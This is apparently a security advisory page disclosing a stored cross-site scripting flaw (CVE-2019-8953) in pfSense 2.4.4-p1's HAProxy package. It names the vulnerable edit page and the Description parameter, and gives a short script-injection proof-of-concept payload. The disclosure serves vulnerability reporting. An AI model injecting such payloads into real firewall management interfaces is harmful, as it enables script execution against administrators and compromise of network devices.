pfSense 2.4.4-p1 (HAProxy Package 0.59_14) Cross Site Scripting

2019.03.14
Credit: Gionathan Reale
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting # Date: 13.02.2019 # Exploit Author: Gionathan "John" Reale # Vendor Homepage: https://www.pfsense.org # Version: 2.4.4-p1/0.59_14 # Software Link: N/A # Google Dork: N/A # CVE:2019-8953 ################################################################################################################################## Introduction pfSenseA(r) software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. ################################################################################# Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php PARAMETER Description PAYLOAD "><script>alert("test")</script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top